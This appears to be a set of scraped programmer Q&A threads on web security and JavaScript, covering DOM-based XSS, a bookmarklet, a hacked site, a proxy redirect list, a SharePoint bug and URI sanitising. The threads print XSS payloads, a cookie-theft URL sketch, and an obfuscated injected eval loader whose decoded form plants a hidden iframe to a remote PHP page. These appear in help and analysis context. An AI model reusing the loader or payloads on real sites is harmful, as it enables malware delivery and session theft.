Cross Site Scripting issue with window.location.search - javascript
I have been going through so many forums & wikipedia's since few days for trying to understand about XSS attacks alomost I have spent 2-3 days but still not get better idea as suggesting multiple solutions by experts & I want know how the hackers can inject malicious code on victims browser ? and my application have been use to run on some App Scanner standard testing tool so its caught so many XSS issues. I want put here one of XSS issue of my application so can please some one help me out to understand the what exactly I have to do for this issue. Still I have been trying a lot to get better understand about XSS issues. This is my code snippet
function getParameter(param) {
var val = "";
var qs = window.location.search;
var start = qs.indexOf(param);
if (start != -1) {
start += param.length + 1;
var end = qs.indexOf("&", start);
if (end == -1) {
end = qs.length
}
val = qs.substring(start,end);
}
return val;
}
var formName = getParameter("formName");
var myValue = ''+thisDay+'</td>';
document.getElementById('calendarA').innerHTML = myValue;
And these statements are
var qs = window.location.search;
val = qs.substring(start,end);
var formName = getParameter("formName");
var myValue = ''+thisDay+'</td>';
document.getElementById('calendarA').innerHTML = myValue;
cought by App scanner testing tool as possible code for XSS(Cross Site Scripting) issues but I am not sure how it is cause to XSS & how I can fix this issue now. Can anybody please provide insights on how this vulnerability can be fixed?
var myValue = ''+thisDay+'</td>';
This line doesn't have any escaping, it expects '(... \''+formName+'\' );...' to be a string. But it can become some other thing:
formName = "'); alert('I\'m free to do anything here'); (''+"
document.getElementById('calendarA').innerHTML = myValue;
Let's place such fragment into myValue:
... <img src=void onerror="alert('hacked')" /> ...
You can check it works:
document.querySelector('button').addEventListener('click', function () {
document.querySelector('output').innerHTML = document.querySelector('textarea').value;
})
<textarea>... <img src=void onerror="alert('hacked')" /> ...</textarea>
<button>Go</button>
<output></output>
You should never trust any data passed by url string. Any site can place any link to you site. Some user clicks it, goes to your site, parameters are executed in context of your site, and attacker can do anything he wants to.
Nothing in the code you've shown us is vulnerable.
You are reading user input, so there is the potential to introduce a vulnerability there. That is probably what the tool you are using is detecting.
If your code is vulnerable, then it will be because of whatever you do with the value of formName next (in the code you haven't shown us).
This is a possible DOM based XSS issue.
If you are using the value of formName like document.getElementById("demo").innerHTML=formName or somehow your DOM elements are being created/modified using the formName you are vulnerable,
as i can create a custom url like http://urwebsite.html?formName=<script>document.cookie_will_be_transfered_to_my_server_here</script> and ask a logged in person to click it(simple social engineering) .Now i have that person's session id, using which i can do what ever i want.
As a resolution, all the input data from the user has to be html encoded.
Related
bookmarklet: click for random specified links from a host domain
tl;dr: A bookmarklet that opens in a new tab: random link (with specified multiple html-classes) from a specified domain and code that works with current logins. Thank you. short version of butchered code: javascript: ( var % 20 site = domain.com function() { window.location.host == site void(window.open(document.links[Math.floor(document.querySelectorAll("a.class1, a.class2"))].href, '_blank')) }(); //beautified with: http://jsbeautifier.org/ To whom it may concern: I have searched around for a while and even considered switching services but although some come close or are similar to my particular request, none have served to address everything the request entails. Execute the script on a specific domain even when no page from said domain is currently open. If login authentication for attaining the information or data for execution is required, read or work in conjunction with existing session. Fetch from a specific domain host, a random link out of all links on that domain with a certain html-class (or indeed otherwise) using preferably, css-selectors. Open the results in a new tab. From butchering such similarities, the result became something like this: //bookmarklet javascript: //anonymous function+ wrapped code before execution ( // function global variables for quick substitution var %20 site = domain.com function(){ //set domain for script execution window.location.host == site //open new tab for void(window.open(document.links //random link [Math.floor //with specific classes (elements found with css selectors) (document.querySelectorAll("a.class1, a.class2")) ]//end random-query .href,'_blank' //end page-open )//end link-open )//end "void" }//end function defintion //execute (); //(tried) checked with: //http://www.javascriptlint.com/online_lint.php Lastly, i have attained at most, basic css knowledge. I apologise if this request has anybody headdesking, palming or otherwise in gtfo mode. It is only too sad there is apparently no tag for "Warning: I DIY-ed this stuff" in StackExchange. However, i still would like answers that go into a bit of depth of explaining why and what each correction and modification is. Thank you presently, for your time and effort.
Theoretically, the following code should do what you want: window.addEventListener('load', function ( ) { var query = 'a.class1[href], a.class2[href]'; var candidates = document.querySelectorAll(query); var choice = Math.floor(Math.random() * candidates.length); window.open(candidates.item(choice).href, 'randomtab'); }, true); window.location.href = 'http://domain.com'; But it doesn't, because the possibility to retain event listeners across a page unload could be abused and browsers protect you against such abuse. Instead, you can manually load the domain of your choice and then click a simpler bookmarklet with the following code: var query = 'a.class1[href], a.class2[href]'; var candidates = document.querySelectorAll(query); var choice = Math.floor(Math.random() * candidates.length); window.open(candidates.item(choice).href, 'randomtab'); You could wrap the above in javascript:(function ( ) { ... })(); and minify as before, but it already works if you just minify it and only slap a javascript: in front. I understand your situation of being an absolute beginner and posting "DIY" code, but I'm still not going to explain step-by-step why this code works and yours doesn't. The first version of the code above is complex to explain to a beginner, and the list of issues with the code in the question is too long to discuss all of them. You'll be better off by studying more Javascript; a good resource with tutorials is MDN.
Site hacked with javascript code inserted
A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help? <script type="text/javascript" language="javascript"> if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka)); </script> I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated! Thanks.
In my experience, these sort of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them. Your best bet? Accept that there is definitely going to be an impact to your users, and then do your due diligence: Notify your shared host if you're not the owner. Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. tar -czf website-$(date +%F).tar.gz ~/ or your shared hosting backup utility.) Check for any malicious processes or scripts that could be running. ps gaux is your friend. Nuke everything in the shared hosting account. Change every password, regardless, even if you think it couldn't have possibly been affected. Re-create the account and leave a maintenance page available for your users. You should have backups of your account. Unpack the backup within a virtual machine and investigate everything including logs and other information to discover how the attack occurred. Apply what you learn to your website code. Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, Wordpress or something similar, take this time to upgrade to the latest version. Do not skip steps, or this will happen again.
This is what was injected. To decipher this, you do the same thing the javascript in your post does. Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code. How it could be used maliciously, I'm not sure. Anyone have any ideas? function v09() { var static = 'ajax'; var controller = 'index.php'; var v = document.createElement('iframe'); v.src = 'http://upclient.com/.smileys/gZKqHhW3.php'; v.style.position = 'absolute'; v.style.color = '968'; v.style.height = '968px'; v.style.width = '968px'; v.style.left = '1000968'; v.style.top = '1000968'; if (!document.getElementById('v')) { document.write('<p id=\'v\' class=\'v09\' ></p>'); document.getElementById('v').appendChild(v); } } function SetCookie(cookieName, cookieValue, nDays, path) { var today = new Date(); var expire = new Date(); if (nDays == null || nDays == 0) nDays = 1; expire.setTime(today.getTime() + 3600000 * 24 * nDays); document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie(name) { var start = document.cookie.indexOf(name + "="); var len = start + name.length + 1; if ((!start) && (name != document.cookie.substring(0, name.length))) { return null; } if (start == -1) return null; var end = document.cookie.indexOf(";", len); if (end == -1) end = document.cookie.length; return unescape(document.cookie.substring(len, end)); } if (navigator.cookieEnabled) { if (GetCookie('visited_uq') == 55) { } else { SetCookie('visited_uq', '55', '1', '/'); v09(); } }
This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity. I realized that someone used one of my forms to do code injection (my sites are PHP). This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server. For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages. With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded. You can also make sure to sanitize inputs so that no malicious text can be effective in any of your forms.
Javascript random redirect
so my situation is as follows: I wrote a submission system in php that writes to a textfile rather than a database, the idea of the system is people submit their url to the textfile and then when that script is called on a page, it redirects to a random address out of the textfile; the problem is, I don't know how to make javascript read from the text file and then pick a line to redirect to. Actually, just to clarify, I know how to make javascript read from the text file; but I have NO idea how id write a function to pick a url from the file and forward to it. Seeing as I hit this road block a couple of days ago, the only way I have been handling submissions is checking the text file every 12 hours for new submissions and then manually adding them to this code: setTimeout(function() { var howMany = 38; var page = new Array(howMany+1); page[0]="http://gproxy.nl/"; page[1]="http://homeproxy.me/"; page[2]="http://proxyturbo.com/"; page[3]="http://www.lblocker.info/"; page[4]="http://goprivate.eu/"; page[5]="http://jsproxy.com/"; page[6]="http://openthis.eu/"; page[7]="http://proxy4home.info/"; page[8]="http://dedicatedipaddress.net/"; page[9]="https://www.4everproxy.com/"; page[10]="http://www.surfsearch.info/"; page[11]="http://www.leaveproxy.com/"; page[12]="http://proxyecole.fr/"; page[13]="http://newipnow.com/"; page[14]="http://www.hiddenmode.info/"; page[15]="https://europrox.org/"; page[16]="https://www.4everproxy.com/"; page[17]="https://goingthere.org/"; page[18]="http://xuxor.com/"; page[19]="http://033b.com/"; page[20]="http://thewebtunnel.com/"; page[21]="http://prox.phanteye.com/"; page[22]="http://www.hiddenall.info/"; page[23]="http://www.5966.info/"; page[24]="http://hideyoself.com/"; page[25]="http://prox.phanteye.com/"; page[26]="http://freevideoproxy.com/"; page[27]="http://thewebtunnel.com/"; page[28]="http://openthis.eu/"; page[29]="https://europrox.org/"; page[30]="http://xuxor.com/"; page[31]="https://incloak.com/"; page[32]="http://www.leaveproxy.com/"; page[33]="http://www.openunblocker.com/"; page[34]="http://post48.com"; page[35]="http://post48.com"; page[36]="http://inteproxy.com"; page[37]="http://208.73.23.59"; page[38]="http://hidemetoday.com/"; function rndnumber(){ var randscript = -1; while (randscript < 0 || randscript > howMany || isNaN(randscript)){ randscript = parseInt(Math.random()*(howMany+1)); } return randscript; } quo = rndnumber(); quox = page[quo]; window.location=(quox); }, 1500); I would be very grateful if someone would help me write the script or tell me what kind of function I should be googling to look up, googling "How to make javascript read from a textfile and redirect" doesn't really turn up much ; ( Many thanks!
If I understand correctly, first, you'll need a regex to find the URLs in the file. I would refer to this SO post for that: regular expression for url Once you have that, you can go to any URL with window.location.href = 'http://google.com'; So, you'll do something like this... var urlPattern = /((([A-Za-z]{3,9}:(?:\/\/)?)(?:[-;:&=\+\$,\w]+#)?[A-Za-z0-9.-]+|(?:www.|[-;:&=\+\$,\w]+#)[A-Za-z0-9.-]+)((?:\/[\+~%\/.\w-_]*)?\??(?:[-\+=&;%#.\w_]*)#?(?:[\w]*))?)/g; var urls = data.match(urlPattern); if (urls) { window.location.href = urls[7]; } Is that what you're looking for? Or you can use a more simple regex like var urlPat = /https?:\/\/[^'"]+/g Remember to use the /g flag with your regex to get all occurrences of the urls.
MOSS 07 editform.aspx fails to commit and goes to blank html page
Found solution from Microsoft Blog... see below OK, to start I don't like the word random but I cannot find any correlation in test cases for this problem so I am going to use random to describe parts of this problem. The setup: I have a list where i have crated a customized UI for the EditForm.aspx and NewForm.aspx. I use the same JS file and JavaScript between the two of them. I have added in a google map to help illustrate the location selection. I have added extra code to the "OK" button for some dynamic validation. I have done a lot of dynamic menu things as well. All users use IE 9 and the site is on a MOSS 2007 server. The problem: Only on the EditForm.aspx, clicking OK "Randomly" results in an immediate white screen. The form is not saved and when viewing the source code of the white screen i find a blank html page. What I have tried to find this problem: - I tried to narrow down the user and computer this happens on and found that it happens for everyone on every computer(once again "Randomly"). - I tried disabling the code that is pre-pended to the "OK" button - I tried following the code with the IE9's external script debugged and found no errors I can provide the code but it is a bit long and I really do not know where to begin. So i can provide it if needed. Thanks for the help ahead of time. Edit: This is the code re-wiring my OK button(i reset the value to "Save" earlier) var okBtns = $('input[value="Save"]') $.each(okBtns, function(index,value){ okFunction=$(value).attr('onclick'); $(value).attr('onclick','return false;') $(value).bind('click', function(){ if ($('#'+StatusBox).val()=='Draft') {$('#'+StatusBox).val('New Request')} var err = clickOKbutton(); if(err==0) {okFunction()}; }); }); This is the clickOKbutton function witch is th code prepended to the orgianal sharepoint operations: function clickOKbutton() { //all of the imput validation i could ever wish for!!!! var NoteVal = '' var NameAry = $('#'+PersonnelBox).parent().children(":first").children("SPAN").children("SPAN"); $.each(NameAry, function(index,value){ var $n=$(value).html(); if(NoteVal.length==0) {NoteVal=$n} else {NoteVal=NoteVal+';'+$n}; }); //$('#'+AddNotes).val(NoteVal); var plh = $('#'+PersonnelBox).parent().html() userNameTx = $('#zz8_Menu').text(); userNameTx = userNameTx.replace('Welcome ',''); $.each(OICUsers, function(i,v){ if(plh.indexOf(v) > -1 && st=='New Request'){ $('#'+StatusBox).val('OIC Bypassed') $('#'+CommentsBox).val('OIC is travling on this TDY/TAD and cannot approve. So this request is bypassing the "OIC Approval" step') } }); /*userNameTx = $('#zz8_Menu').text(); userNameTx = userNameTx.replace('Welcome ','') $('#' + ModBox).closest('TR').show();*/ var message='' message = detectFieldChanges(AllFieldsArray,AllOrgValArray,"Draft,New Request,Modified") if(message.length>0){ $('#'+ModBox).val(message); AutoResizeTextarea(ModBox); } message = detectFieldChanges(ValFieldsArray,OrgValuesArray,"Draft,New Request,Modified,OIC Approved,OIC Bypassed,Pending RFI,Ready for COS") userNameTx = $('#zz8_Menu').text(); userNameTx = userNameTx.replace('Welcome ',''); if(message.length>0&&$.inArray(userNameTx,COSUsers)==-1){ $('#'+StatusBox).val('Modified').change; $('#'+StatusLongBox).val('Modified').change; } //Subject box var pb = NoteVal; var ep = $('#'+ExtPersonnel).val(); var ab = $('#'+AddressBox).val(); var sd = $('#'+sDateBox).val(); var ed = $('#'+eDateBox).val(); var st = $('#'+StatusBox).val(); var p = pb+';'+ep; var p = p.replace(/mossaspnetmembershipprovider:/g,''); var p = p.slice(0,-1); var ad = ab+' '+sd+' to '+ed; var s = 'eTDY | '+st+' - '+p+' - '+ad; if(s.length>255){ var l = s.length-255; p = p.substring(0,p.length-l); s = 'eTDY | '+p+' - '+ad; } $('#'+Subject).val(s); //check Lat/Lng value if($('#'+LatBox).val()=='' || $('#'+LngBox).val()==''){ //alert("Cannot continue unless the Lat Lng has a vallid coordinate"); if($('#LatLngError').length==0){ errorHTML='<br><span class="ms-error" id="LatLngError">You must specify a value for Lat and Lng</span>' $('#'+AddressBox).closest('TD').append(errorHTML) } return -1 } return 0 }; It is messy but hopefully you can make sense of it. Edit 2: I think I have tracked the randomness down... I completely turned off all custom code and still have the problem. I then tried comparing a working record with a non working record. Everything looked normal until i got to the field with a multiple people picker. If i have more than 2 people in that field it will save normal but when i go to make a modification on that record with more than 2 people in the people picker field is causes this problem. I am going to do some more research and will post my results. Edit 3: http://blogs.msdn.com/b/jorman/archive/2009/12/22/mystery-of-the-sharepoint-white-screens.aspx This problem all boils down to IIS configuration and the Impersonation Level. Apparently our server admins decided to change it without telling anyone.
Usually, when you get [seemingly random] behavior from a web page (especially in MOSS), it means that you have ambiguous events defined on the page. Usually, I get this when I add some kind of JScript to a button or form on_submit. Without seeing your code, I can't really narrow it down further than that. I recommend: look for JavaScript events on your HTML form or on your button click events or look for anchor [a] tags that point to nowhere (href=#) but have javascript. Then decide to do it (strictly) the HTML way (forms, submit buttons) or the javascript way, (no forms, no asp:button) and un-wire the other.
This problem all boils down to IIS configuration and the Impersonation Level. Apparently our server admins decided to change it without telling anyone. http://blogs.msdn.com/b/jorman/archive/2009/12/22/mystery-of-the-sharepoint-white-screens.aspx
Is there a better way to do this? (recursively resolving HTML unicode entities)
I'm parsing an untrusted URI, but its URI-hood must be honored. I'm trying to protect against javascript: links, but I feel like I need to recurse on it, since you could have: javascriptjavascript:: and after stripping out all instances of javascript: get back our old friend javascript: once again. My other concern is analogously-nested unicode entities. For instance, we could have: "jAvascript:alert('pwnt')" ...but we could also have: "j&#塁vascript:alert('pwnt')" ...though I seem to be doing it wrong (whereas a successful attacker obviously won't.) function resolveEntities(uri) { var s = document.createElement('span') , nestTally = uri.match(/&/) ? 0 : 1 , limitReached = false; s.innerHTML = uri; while (s.textContent.match(/&/)) { s.innerHTML = s.textContent; if(nestTally++ >= 5) { limitReached = true; break; } } return encodeURI(s.textContent); }
Didn't you already ask almost the same question before? Anyway, my suggestion remains the same: use a proper HTML sanitizer. The particular sanitizer I linked to strips javascript: URLs automatically, but you can also set it up to allow only certain whitelisted URL schemes like Thomas suggests. As he notes, this is a good idea, since it's much safer to only allow schemes like http and https which you know to be safe. (In particular, whether a given obscure URL scheme is safe or not may depend not only on the user's browser, but also on their OS and on what third-party software they may have installed — a lot of programs like to register themselves as handlers for their own URL schemes.)
Rather than specifying what you want to blacklist (e.g. javascript: URIs), it's better to specify what you want to whitelist (e.g. http and https only). What about something like this: function sanitizeUri(uri) { if (!uri.match(/^https?:\/\//)) { uri = "http://" + uri; } return uri; }